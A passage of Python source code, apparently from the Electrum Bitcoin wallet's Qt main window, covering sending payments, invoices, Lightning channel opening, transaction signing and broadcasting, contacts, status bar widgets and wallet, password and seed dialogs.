vbox0.addLayout(grid) hbox = QHBoxLayout() hbox.addLayout(vbox0) hbox.addStretch(1) w = QWidget() vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.invoices_label) vbox.addWidget(self.invoice_list) vbox.setStretchFactor(self.invoice_list, 1000) w.searchable_list = self.invoice_list run_hook('create_send_tab', grid) return w def spend_max(self): if 
run_hook('abort_send', self): return outputs = self.payto_e.get_outputs(True) if not outputs: return make_tx = lambda fee_est: self.wallet.make_unsigned_transaction( coins=self.get_coins(), outputs=outputs, fee=fee_est, is_sweep=False) try: try: tx = make_tx(None) except (NotEnoughFunds, NoDynamicFeeEstimates) as e: # Check if we had enough funds excluding fees, # if so, still provide opportunity to set lower fees. tx = make_tx(0) except MultipleSpendMaxTxOutputs as e: self.max_button.setChecked(False) self.show_error(str(e)) return except NotEnoughFunds as e: self.max_button.setChecked(False) text = self.get_text_not_enough_funds_mentioning_frozen() self.show_error(text) return self.max_button.setChecked(True) amount = tx.output_value() __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0) amount_after_all_fees = amount - x_fee_amount self.amount_e.setAmount(amount_after_all_fees) def get_contact_payto(self, key): _type, label = self.contacts.get(key) return label + ' <' + key + '>' if _type == 'address' else key def update_completions(self): l = [self.get_contact_payto(key) for key in self.contacts.keys()] self.completions.setStringList(l) @protected def protect(self, func, args, password): return func(*args, password) def read_outputs(self) -> List[PartialTxOutput]: if self.payment_request: outputs = self.payment_request.get_outputs() else: outputs = self.payto_e.get_outputs(self.max_button.isChecked()) return outputs def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool: """Returns whether there are errors with outputs. Also shows error dialog to user if so. """ if not outputs: self.show_error(_('No outputs')) return True for o in outputs: if o.scriptpubkey is None: self.show_error(_('Bitcoin Address is None')) return True if o.value is None: self.show_error(_('Invalid Amount')) return True return False # no errors def check_send_tab_payto_line_and_show_errors(self) -> bool: """Returns whether there are errors. Also shows error dialog to user if so. """ pr = self.payment_request if pr: if pr.has_expired(): self.show_error(_('Payment request has expired')) return True if not pr: errors = self.payto_e.get_errors() if errors: if len(errors) == 1 and not errors[0].is_multiline: err = errors[0] self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" + f"{err.line_content[:40]}...\n\n" f"{err.exc!r}") else: self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([_("Line #") + f"{err.idx+1}: {err.line_content[:40]}... 
({err.exc!r})" for err in errors])) return True if self.payto_e.is_alias and self.payto_e.validated is False: alias = self.payto_e.toPlainText() msg = _('WARNING: the alias "{}" could not be validated via an additional ' 'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n' msg += _('Do you wish to continue?') if not self.question(msg): return True return False # no errors def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]): if amount_msat is None: raise Exception("missing amount for LN invoice") amount_sat = Decimal(amount_msat) / 1000 # FIXME this is currently lying to user as we truncate to satoshis msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat)) if not self.question(msg): return self.save_pending_invoice() def task(): coro = self.wallet.lnworker.pay_invoice(invoice, amount_msat=amount_msat, attempts=LN_NUM_PAYMENT_ATTEMPTS) fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) return fut.result() self.wallet.thread.add(task) def on_request_status(self, wallet, key, status): if wallet != self.wallet: return req = self.wallet.receive_requests.get(key) if req is None: return if status == PR_PAID: self.notify(_('Payment received') + '\n' + key) self.need_update.set() else: self.request_list.update_item(key, req) def on_invoice_status(self, wallet, key): if wallet != self.wallet: return invoice = self.wallet.get_invoice(key) if invoice is None: return status = self.wallet.get_invoice_status(invoice) if status == PR_PAID: self.invoice_list.update() else: self.invoice_list.update_item(key, invoice) def on_payment_succeeded(self, wallet, key): description = self.wallet.get_label(key) self.notify(_('Payment succeeded') + '\n\n' + description) self.need_update.set() def on_payment_failed(self, wallet, key, reason): self.show_error(_('Payment failed') + '\n\n' + reason) def read_invoice(self): if self.check_send_tab_payto_line_and_show_errors(): return if not self._is_onchain: invoice_str = self.payto_e.lightning_invoice if not invoice_str: return if not self.wallet.has_lightning(): self.show_error(_('Lightning is disabled')) return invoice = LNInvoice.from_bech32(invoice_str) if invoice.get_amount_msat() is None: amount_sat = self.amount_e.get_amount() if amount_sat: invoice.amount_msat = int(amount_sat * 1000) else: self.show_error(_('No amount')) return return invoice else: outputs = self.read_outputs() if self.check_send_tab_onchain_outputs_and_show_errors(outputs): return message = self.message_e.text() return self.wallet.create_invoice( outputs=outputs, message=message, pr=self.payment_request, URI=self.payto_URI) def do_save_invoice(self): self.pending_invoice = self.read_invoice() if not self.pending_invoice: return self.save_pending_invoice() def save_pending_invoice(self): if not self.pending_invoice: return self.do_clear() self.wallet.save_invoice(self.pending_invoice) self.invoice_list.update() self.pending_invoice = None def do_pay(self): self.pending_invoice = self.read_invoice() if not self.pending_invoice: return self.do_pay_invoice(self.pending_invoice) def pay_multiple_invoices(self, invoices): outputs = [] for invoice in invoices: outputs += invoice.outputs self.pay_onchain_dialog(self.get_coins(), outputs) def do_pay_invoice(self, invoice: 'Invoice'): if invoice.type == PR_TYPE_LN: assert isinstance(invoice, LNInvoice) self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat()) elif invoice.type == PR_TYPE_ONCHAIN: 
assert isinstance(invoice, OnchainInvoice) self.pay_onchain_dialog(self.get_coins(), invoice.outputs) else: raise Exception('unknown invoice type') def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]: coins = self.get_manually_selected_coins() if coins is not None: return coins else: return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only) def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]: """Return a list of selected coins or None. Note: None means selection is not being used, while an empty sequence means the user specifically selected that. """ return self.utxo_list.get_spend_list() def get_text_not_enough_funds_mentioning_frozen(self) -> str: text = _("Not enough funds") frozen_bal = sum(self.wallet.get_frozen_balance()) if frozen_bal: text += " ({} {} {})".format( self.format_amount(frozen_bal).strip(), self.base_unit(), _("are frozen") ) return text def pay_onchain_dialog( self, inputs: Sequence[PartialTxInput], outputs: List[PartialTxOutput], *, external_keypairs=None) -> None: # trustedcoin requires this if run_hook('abort_send', self): return is_sweep = bool(external_keypairs) make_tx = lambda fee_est: self.wallet.make_unsigned_transaction( coins=inputs, outputs=outputs, fee=fee_est, is_sweep=is_sweep) output_values = [x.value for x in outputs] if output_values.count('!') > 1: self.show_error(_("More than one output set to spend max")) return output_value = '!' if '!' in output_values else sum(output_values) conf_dlg = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep) if conf_dlg.not_enough_funds: # Check if we had enough funds excluding fees, # if so, still provide opportunity to set lower fees. if not conf_dlg.have_enough_funds_assuming_zero_fees(): text = self.get_text_not_enough_funds_mentioning_frozen() self.show_message(text) return # shortcut to advanced preview (after "enough funds" check!) if self.config.get('advanced_preview'): preview_dlg = PreviewTxDialog( window=self, make_tx=make_tx, external_keypairs=external_keypairs, output_value=output_value) preview_dlg.show() return cancelled, is_send, password, tx = conf_dlg.run() if cancelled: return if is_send: self.save_pending_invoice() def sign_done(success): if success: self.broadcast_or_show(tx) self.sign_tx_with_password(tx, callback=sign_done, password=password, external_keypairs=external_keypairs) else: preview_dlg = PreviewTxDialog( window=self, make_tx=make_tx, external_keypairs=external_keypairs, output_value=output_value) preview_dlg.show() def broadcast_or_show(self, tx: Transaction): if not tx.is_complete(): self.show_transaction(tx) return if not self.network: self.show_error(_("You can't broadcast a transaction without a live network connection.")) self.show_transaction(tx) return self.broadcast_transaction(tx) @protected def sign_tx(self, tx, *, callback, external_keypairs, password): self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs) def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None): '''Sign the transaction in a separate thread. When done, calls the callback with a success code of True or False. 
''' def on_success(result): callback(True) def on_failure(exc_info): self.on_error(exc_info) callback(False) on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success if external_keypairs: # can sign directly task = partial(tx.sign, external_keypairs) else: task = partial(self.wallet.sign_transaction, tx, password) msg = _('Signing transaction...') WaitingDialog(self, msg, task, on_success, on_failure) def broadcast_transaction(self, tx: Transaction): def broadcast_thread(): # non-GUI thread pr = self.payment_request if pr and pr.has_expired(): self.payment_request = None return False, _("Invoice has expired") try: self.network.run_from_another_thread(self.network.broadcast_transaction(tx)) except TxBroadcastError as e: return False, e.get_message_for_gui() except BestEffortRequestFailed as e: return False, repr(e) # success txid = tx.txid() if pr: self.payment_request = None refund_address = self.wallet.get_receiving_address() coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address) fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) ack_status, ack_msg = fut.result(timeout=20) self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}") return True, txid # Capture current TL window; override might be removed on return parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin)) def broadcast_done(result): # GUI thread if result: success, msg = result if success: parent.show_message(_('Payment sent.') + '\n' + msg) self.invoice_list.update() else: msg = msg or '' parent.show_error(msg) WaitingDialog(self, _('Broadcasting transaction...'), broadcast_thread, broadcast_done, self.on_error) def mktx_for_open_channel(self, funding_sat): coins = self.get_coins(nonlocal_only=True) make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(coins=coins, funding_sat=funding_sat, fee_est=fee_est) return make_tx def open_channel(self, connect_str, funding_sat, push_amt): try: extract_nodeid(connect_str) except ConnStringFormatError as e: self.show_error(str(e)) return # use ConfirmTxDialog # we need to know the fee before we broadcast, because the txid is required make_tx = self.mktx_for_open_channel(funding_sat) d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False) # disable preview button because the user must not broadcast tx before establishment_flow d.preview_button.setEnabled(False) cancelled, is_send, password, funding_tx = d.run() if not is_send: return if cancelled: return # read funding_sat from tx; converts '!' 
to int value funding_sat = funding_tx.output_value_for_address(ln_dummy_address()) def task(): return self.wallet.lnworker.open_channel(connect_str=connect_str, funding_tx=funding_tx, funding_sat=funding_sat, push_amt_sat=push_amt, password=password) def on_success(args): chan, funding_tx = args n = chan.constraints.funding_txn_minimum_depth message = '\n'.join([ _('Channel established.'), _('Remote peer ID') + ':' + chan.node_id.hex(), _('This channel will be usable after {} confirmations').format(n) ]) if not funding_tx.is_complete(): message += '\n\n' + _('Please sign and broadcast the funding transaction') self.show_message(message) if not funding_tx.is_complete(): self.show_transaction(funding_tx) def on_failure(exc_info): type_, e, traceback = exc_info self.show_error(_('Could not open channel: {}').format(repr(e))) WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure) def query_choice(self, msg, choices): # Needed by QtHandler for hardware wallets dialog = WindowModalDialog(self.top_level_window()) clayout = ChoicesLayout(msg, choices) vbox = QVBoxLayout(dialog) vbox.addLayout(clayout.layout()) vbox.addLayout(Buttons(OkButton(dialog))) if not dialog.exec_(): return None return clayout.selected_index() def lock_amount(self, b: bool) -> None: self.amount_e.setFrozen(b) self.max_button.setEnabled(not b) def prepare_for_payment_request(self): self.show_send_tab() self.payto_e.is_pr = True for e in [self.payto_e, self.message_e]: e.setFrozen(True) self.lock_amount(True) self.payto_e.setText(_("please wait...")) return True def delete_invoices(self, keys): for key in keys: self.wallet.delete_invoice(key) self.invoice_list.update() def payment_request_ok(self): pr = self.payment_request if not pr: return key = pr.get_id() invoice = self.wallet.get_invoice(key) if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID: self.show_message("invoice already paid") self.do_clear() self.payment_request = None return self.payto_e.is_pr = True if not pr.has_expired(): self.payto_e.setGreen() else: self.payto_e.setExpired() self.payto_e.setText(pr.get_requestor()) self.amount_e.setAmount(pr.get_amount()) self.message_e.setText(pr.get_memo()) # signal to set fee self.amount_e.textEdited.emit("") def payment_request_error(self): pr = self.payment_request if not pr: return self.show_message(pr.error) self.payment_request = None self.do_clear() def on_pr(self, request: 'paymentrequest.PaymentRequest'): self.set_onchain(True) self.payment_request = request if self.payment_request.verify(self.contacts): self.payment_request_ok_signal.emit() else: self.payment_request_error_signal.emit() def parse_lightning_invoice(self, invoice): """Parse ln invoice, and prepare the send tab for it.""" try: lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP) except Exception as e: raise LnDecodeException(e) from e pubkey = bh2u(lnaddr.pubkey.serialize()) for k,v in lnaddr.tags: if k == 'd': description = v break else: description = '' self.payto_e.setFrozen(True) self.payto_e.setText(pubkey) self.message_e.setText(description) if lnaddr.get_amount_sat() is not None: self.amount_e.setAmount(lnaddr.get_amount_sat()) #self.amount_e.textEdited.emit("") self.set_onchain(False) def set_onchain(self, b): self._is_onchain = b self.max_button.setEnabled(b) def pay_to_URI(self, URI): if not URI: return try: out = util.parse_URI(URI, self.on_pr) except InvalidBitcoinURI as e: self.show_error(_("Error parsing URI") + f":\n{e}") return self.show_send_tab() self.payto_URI = out r = 
out.get('r') sig = out.get('sig') name = out.get('name') if r or (name and sig): self.prepare_for_payment_request() return address = out.get('address') amount = out.get('amount') label = out.get('label') message = out.get('message') # use label as description (not BIP21 compliant) if label and not message: message = label if address: self.payto_e.setText(address) if message: self.message_e.setText(message) if amount: self.amount_e.setAmount(amount) self.amount_e.textEdited.emit("") def do_clear(self): self.max_button.setChecked(False) self.payment_request = None self.payto_URI = None self.payto_e.is_pr = False self.set_onchain(False) for e in [self.payto_e, self.message_e, self.amount_e]: e.setText('') e.setFrozen(False) self.update_status() run_hook('do_clear', self) def set_frozen_state_of_addresses(self, addrs, freeze: bool): self.wallet.set_frozen_state_of_addresses(addrs, freeze) self.address_list.update() self.utxo_list.update() def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool): utxos_str = {utxo.prevout.to_str() for utxo in utxos} self.wallet.set_frozen_state_of_coins(utxos_str, freeze) self.utxo_list.update() def create_list_tab(self, l, toolbar=None): w = QWidget() w.searchable_list = l vbox = QVBoxLayout() w.setLayout(vbox) #vbox.setContentsMargins(0, 0, 0, 0) #vbox.setSpacing(0) if toolbar: vbox.addLayout(toolbar) vbox.addWidget(l) return w def create_addresses_tab(self): from .address_list import AddressList self.address_list = l = AddressList(self) toolbar = l.create_toolbar(self.config) toolbar_shown = bool(self.config.get('show_toolbar_addresses', False)) l.show_toolbar(toolbar_shown) return self.create_list_tab(l, toolbar) def create_utxo_tab(self): from .utxo_list import UTXOList self.utxo_list = UTXOList(self) return self.create_list_tab(self.utxo_list) def create_contacts_tab(self): from .contact_list import ContactList self.contact_list = l = ContactList(self) return self.create_list_tab(l) def remove_address(self, addr): if not self.question(_("Do you want to remove {} from your wallet?").format(addr)): return try: self.wallet.delete_address(addr) except UserFacingException as e: self.show_error(str(e)) else: self.need_update.set() # history, addresses, coins self.clear_receive_tab() def paytomany(self): self.show_send_tab() self.payto_e.paytomany() msg = '\n'.join([ _('Enter a list of outputs in the \'Pay to\' field.'), _('One output per line.'), _('Format: address, amount'), _('You may load a CSV file using the file icon.') ]) self.show_message(msg, title=_('Pay to many')) def payto_contacts(self, labels): paytos = [self.get_contact_payto(label) for label in labels] self.show_send_tab() if len(paytos) == 1: self.payto_e.setText(paytos[0]) self.amount_e.setFocus() else: text = "\n".join([payto + ", 0" for payto in paytos]) self.payto_e.setText(text) self.payto_e.setFocus() def set_contact(self, label, address): if not is_address(address): self.show_error(_('Invalid Address')) self.contact_list.update() # Displays original unchanged value return False self.contacts[address] = ('address', label) self.contact_list.update() self.history_list.update() self.update_completions() return True def delete_contacts(self, labels): if not self.question(_("Remove {} from your list of contacts?") .format(" + ".join(labels))): return for label in labels: self.contacts.pop(label) self.history_list.update() self.contact_list.update() self.update_completions() def show_onchain_invoice(self, invoice: OnchainInvoice): amount_str = 
self.format_amount(invoice.amount_sat) + ' ' + self.base_unit() d = WindowModalDialog(self, _("Onchain Invoice")) vbox = QVBoxLayout(d) grid = QGridLayout() grid.addWidget(QLabel(_("Amount") + ':'), 1, 0) grid.addWidget(QLabel(amount_str), 1, 1) if len(invoice.outputs) == 1: grid.addWidget(QLabel(_("Address") + ':'), 2, 0) grid.addWidget(QLabel(invoice.get_address()), 2, 1) else: outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs)) grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0) grid.addWidget(QLabel(outputs_str), 2, 1) grid.addWidget(QLabel(_("Description") + ':'), 3, 0) grid.addWidget(QLabel(invoice.message), 3, 1) if invoice.exp: grid.addWidget(QLabel(_("Expires") + ':'), 4, 0) grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1) if invoice.bip70: pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70)) pr.verify(self.contacts) grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0) grid.addWidget(QLabel(pr.get_requestor()), 5, 1) grid.addWidget(QLabel(_("Signature") + ':'), 6, 0) grid.addWidget(QLabel(pr.get_verify_status()), 6, 1) def do_export(): key = pr.get_id() name = str(key) + '.bip70' fn = getSaveFileName( parent=self, title=_("Save invoice to file"), filename=name, filter="*.bip70", config=self.config, ) if not fn: return with open(fn, 'wb') as f: data = f.write(pr.raw) self.show_message(_('BIP70 invoice saved as {}').format(fn)) exportButton = EnterButton(_('Export'), do_export) buttons = Buttons(exportButton, CloseButton(d)) else: buttons = Buttons(CloseButton(d)) vbox.addLayout(grid) vbox.addLayout(buttons) d.exec_() def show_lightning_invoice(self, invoice: LNInvoice): lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP) d = WindowModalDialog(self, _("Lightning Invoice")) vbox = QVBoxLayout(d) grid = QGridLayout() grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0) grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1) grid.addWidget(QLabel(_("Amount") + ':'), 1, 0) amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit() grid.addWidget(QLabel(amount_str), 1, 1) grid.addWidget(QLabel(_("Description") + ':'), 2, 0) grid.addWidget(QLabel(invoice.message), 2, 1) grid.addWidget(QLabel(_("Hash") + ':'), 3, 0) payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex()) payhash_e.addCopyButton(self.app) payhash_e.setReadOnly(True) vbox.addWidget(payhash_e) grid.addWidget(payhash_e, 3, 1) if invoice.exp: grid.addWidget(QLabel(_("Expires") + ':'), 4, 0) grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1) vbox.addLayout(grid) invoice_e = ShowQRTextEdit(config=self.config) invoice_e.addCopyButton(self.app) invoice_e.setText(invoice.invoice) vbox.addWidget(invoice_e) vbox.addLayout(Buttons(CloseButton(d),)) d.exec_() def create_console_tab(self): from .console import Console self.console = console = Console() return console def update_console(self): console = self.console console.history = self.wallet.db.get("qt-console-history", []) console.history_index = len(console.history) console.updateNamespace({ 'wallet': self.wallet, 'network': self.network, 'plugins': self.gui_object.plugins, 'window': self, 'config': self.config, 'electrum': electrum, 'daemon': self.gui_object.daemon, 'util': util, 'bitcoin': bitcoin, 'lnutil': lnutil, }) c = commands.Commands( config=self.config, daemon=self.gui_object.daemon, network=self.network, callback=lambda: self.console.set_json(True)) methods = {} def mkfunc(f, method): return lambda *args, 
**kwargs: f(method, args, self.password_dialog, **{**kwargs, 'wallet': self.wallet}) for m in dir(c): if m[0]=='_' or m in ['network','wallet','config','daemon']: continue methods[m] = mkfunc(c._run, m) console.updateNamespace(methods) def create_status_bar(self): sb = QStatusBar() sb.setFixedHeight(35) self.balance_label = QLabel("Loading wallet...") self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse) self.balance_label.setStyleSheet("""QLabel { padding: 0 }""") sb.addWidget(self.balance_label) self.search_box = QLineEdit() self.search_box.textChanged.connect(self.do_search) self.search_box.hide() sb.addPermanentWidget(self.search_box) self.update_check_button = QPushButton("") self.update_check_button.setFlat(True) self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor)) self.update_check_button.setIcon(read_QIcon("update.png")) self.update_check_button.hide() sb.addPermanentWidget(self.update_check_button) self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog ) sb.addPermanentWidget(self.password_button) sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) ) self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog ) sb.addPermanentWidget(self.seed_button) self.lightning_button = None if self.wallet.has_lightning(): self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog) self.update_lightning_icon() sb.addPermanentWidget(self.lightning_button) self.status_button = None if self.network: self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog) sb.addPermanentWidget(self.status_button) run_hook('create_status_bar', sb) self.setStatusBar(sb) def create_coincontrol_statusbar(self): self.coincontrol_sb = sb = QStatusBar() sb.setSizeGripEnabled(False) #sb.setFixedHeight(3 * char_width_in_lineedit()) sb.setStyleSheet('QStatusBar::item {border: None;} ' + ColorScheme.GREEN.as_stylesheet(True)) self.coincontrol_label = QLabel() self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred) self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse) sb.addWidget(self.coincontrol_label) clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None)) clear_cc_button.setStyleSheet("margin-right: 5px;") sb.addPermanentWidget(clear_cc_button) sb.setVisible(False) return sb def set_coincontrol_msg(self, msg: Optional[str]) -> None: if not msg: self.coincontrol_label.setText("") self.coincontrol_sb.setVisible(False) return self.coincontrol_label.setText(msg) self.coincontrol_sb.setVisible(True) def update_lightning_icon(self): if self.lightning_button is None: return if self.network is None or self.network.channel_db is None: self.lightning_button.setVisible(False) return self.lightning_button.setVisible(True) cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate() # self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}") progress_str = "??%" if progress_percent is not None: progress_str = f"{progress_percent}%" if progress_percent and progress_percent >= 100: self.lightning_button.setMaximumWidth(25) self.lightning_button.setText('') self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced.")) else: self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit()) 
self.lightning_button.setText(progress_str) self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n" "Payments are more likely to succeed with a more complete graph.")) def update_lock_icon(self): icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png") self.password_button.setIcon(icon) def update_buttons_on_seed(self): self.seed_button.setVisible(self.wallet.has_seed()) self.password_button.setVisible(self.wallet.may_have_password()) def change_password_dialog(self): from electrum.storage import StorageEncryptionVersion if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD: from .password_dialog import ChangePasswordDialogForHW d = ChangePasswordDialogForHW(self, self.wallet) ok, encrypt_file = d.run() if not ok: return try: hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption() except UserCancelled: return except BaseException as e: self.logger.exception('') self.show_error(repr(e)) return old_password = hw_dev_pw if self.wallet.has_password() else None new_password = hw_dev_pw if encrypt_file else None else: from .password_dialog import ChangePasswordDialogForSW d = ChangePasswordDialogForSW(self, self.wallet) ok, old_password, new_password, encrypt_file = d.run() if not ok: return try: self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file) except InvalidPassword as e: self.show_error(str(e)) return except BaseException: self.logger.exception('Failed to update password') self.show_error(_('Failed to update password')) return msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected') self.show_message(msg, title=_("Success")) self.update_lock_icon() def toggle_search(self): self.search_box.setHidden(not self.search_box.isHidden()) if not self.search_box.isHidden(): self.search_box.setFocus(1) else: self.do_search('') def do_search(self, t): tab = self.tabs.currentWidget() if hasattr(tab, 'searchable_list'): tab.searchable_list.filter(t) def new_contact_dialog(self): d = WindowModalDialog(self, _("New Contact")) vbox = QVBoxLayout(d) vbox.addWidget(QLabel(_('New Contact') + ':')) grid = QGridLayout() line1 = QLineEdit() line1.setFixedWidth(32 * char_width_in_lineedit()) line2 = QLineEdit() line2.setFixedWidth(32 * char_width_in_lineedit()) grid.addWidget(QLabel(_("Address")), 1, 0) grid.addWidget(line1, 1, 1) grid.addWidget(QLabel(_("Name")), 2, 0) grid.addWidget(line2, 2, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if d.exec_(): self.set_contact(line2.text(), line1.text()) def show_wallet_info(self): dialog = WindowModalDialog(self, _("Wallet Information")) dialog.setMinimumSize(500, 100) vbox = QVBoxLayout() wallet_type = self.wallet.db.get('wallet_type', '') if self.wallet.is_watching_only(): wallet_type += ' [{}]'.format(_('watching-only')) seed_available = _('True') if self.wallet.has_seed() else _('False') keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()] grid = QGridLayout() basename = os.path.basename(self.wallet.storage.path) grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0) grid.addWidget(QLabel(basename), 0, 1) grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0) grid.addWidget(QLabel(wallet_type), 1, 1) grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0) grid.addWidget(QLabel(self.wallet.txin_type), 2, 1) grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0) 
grid.addWidget(QLabel(str(seed_available)), 3, 1) if len(keystore_types) <= 1: grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0) ks_type = str(keystore_types[0]) if keystore_types else _('No keystore') grid.addWidget(QLabel(ks_type), 4, 1) # lightning grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0) if self.wallet.can_have_lightning(): grid.addWidget(QLabel(_('Enabled')), 5, 1) local_nodeid = QLabel(bh2u(self.wallet.lnworker.node_keypair.pubkey)) local_nodeid.setTextInteractionFlags(Qt.TextSelectableByMouse) grid.addWidget(QLabel(_('Lightning Node ID:')), 6, 0) grid.addWidget(local_nodeid, 6, 1, 1, 3) else: grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1) grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2) vbox.addLayout(grid) labels_clayout = None if self.wallet.is_deterministic(): keystores = self.wallet.get_keystores() ks_stack = QStackedWidget() def select_ks(index): ks_stack.setCurrentIndex(index) # only show the combobox in case multiple accounts are available if len(keystores) > 1: def label(idx, ks): if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'): return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}' else: return _("keystore") + f' {idx+1}' labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())] on_click = lambda clayout: select_ks(clayout.selected_index()) labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click) vbox.addLayout(labels_clayout.layout()) for ks in keystores: ks_w = QWidget() ks_vbox = QVBoxLayout() ks_vbox.setContentsMargins(0, 0, 0, 0) ks_w.setLayout(ks_vbox) mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config) mpk_text.setMaximumHeight(150) mpk_text.addCopyButton(self.app) run_hook('show_xpub_button', mpk_text, ks) der_path_hbox = QHBoxLayout() der_path_hbox.setContentsMargins(0, 0, 0, 0) der_path_hbox.addWidget(QLabel(_("Derivation path") + ':')) der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown")) der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse) der_path_hbox.addWidget(der_path_text) der_path_hbox.addStretch() ks_vbox.addWidget(QLabel(_("Master Public Key"))) ks_vbox.addWidget(mpk_text) ks_vbox.addLayout(der_path_hbox) ks_stack.addWidget(ks_w) select_ks(0) vbox.addWidget(ks_stack) vbox.addStretch(1) btn_export_info = run_hook('wallet_info_buttons', self, dialog) btn_close = CloseButton(dialog) btns = Buttons(btn_export_info, btn_close) vbox.addLayout(btns) dialog.setLayout(vbox) dialog.exec_() def remove_wallet(self): if self.question('\n'.join([ _('Delete wallet file?'), "%s"%self.wallet.storage.path, _('If your wallet contains funds, make sure you have saved its seed.')])): self._delete_wallet() @protected def _delete_wallet(self, password): wallet_path = self.wallet.storage.path basename = os.path.basename(wallet_path) r = self.gui_object.daemon.delete_wallet(wallet_path) self.close() if r: self.show_error(_("Wallet removed: {}").format(basename)) else: self.show_error(_("Wallet file not found: {}").format(basename)) @protected def show_seed_dialog(self, password): if not self.wallet.has_seed(): self.show_message(_('This wallet has no seed')) return keystore = self.wallet.get_keystore() try: seed = keystore.get_seed(password) passphrase = keystore.get_passphrase(password) except BaseException as e: self.show_error(repr(e)) return from .seed_dialog import SeedDialog d = SeedDialog(self, seed, passphrase, config=self.config) d.exec_() def show_qrcode(self, 
